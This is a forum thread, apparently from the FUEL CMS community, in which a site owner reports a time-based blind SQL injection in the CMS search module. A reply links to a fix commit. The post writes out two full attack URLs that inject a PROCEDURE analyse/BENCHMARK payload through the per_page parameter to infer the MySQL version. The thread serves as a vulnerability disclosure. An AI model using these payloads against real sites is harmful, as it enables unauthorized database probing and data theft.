Home › Development › Modules
Howdy, Stranger!
It looks like you're new here. If you want to get involved, click one of these buttons!
CRITICAL SECURITY VERSION UPDATE:
https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.13
https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.13
search module sql injections
Hi!
One of our users wrote me a letter which tells about the vulnerability of our site,
our site uses search module and, if in the address bar write:
site freezes for a moment as the IF(MID(version(),1,1)%20LIKE%205 - is true
And thus it is possible to sort the data on the website
And if write this way, site opened immediately:
as we have MYSQL version not less then 5 - version()<5
I'm not very good at sql injections, what do you think about it?
One of our users wrote me a letter which tells about the vulnerability of our site,
our site uses search module and, if in the address bar write:
http:// MY_DOMAIN . com /search?q=what&per_page=1%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)%20LIKE%205,%20BENCHMARK(50000000,SHA1(1)),1))))),1)%23
site freezes for a moment as the IF(MID(version(),1,1)%20LIKE%205 - is true
And thus it is possible to sort the data on the website
And if write this way, site opened immediately:
http:// MY_DOMAIN . com /search?q=або&per_page=1%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(if(version()<5,BENCHMARK(50000000,SHA1(1)),1))))),1)%23
as we have MYSQL version not less then 5 - version()<5
I'm not very good at sql injections, what do you think about it?
Comments
https://github.com/daylightstudio/FUEL-CMS-Search/commit/facb1ab634221386d560143b583331f2111336e4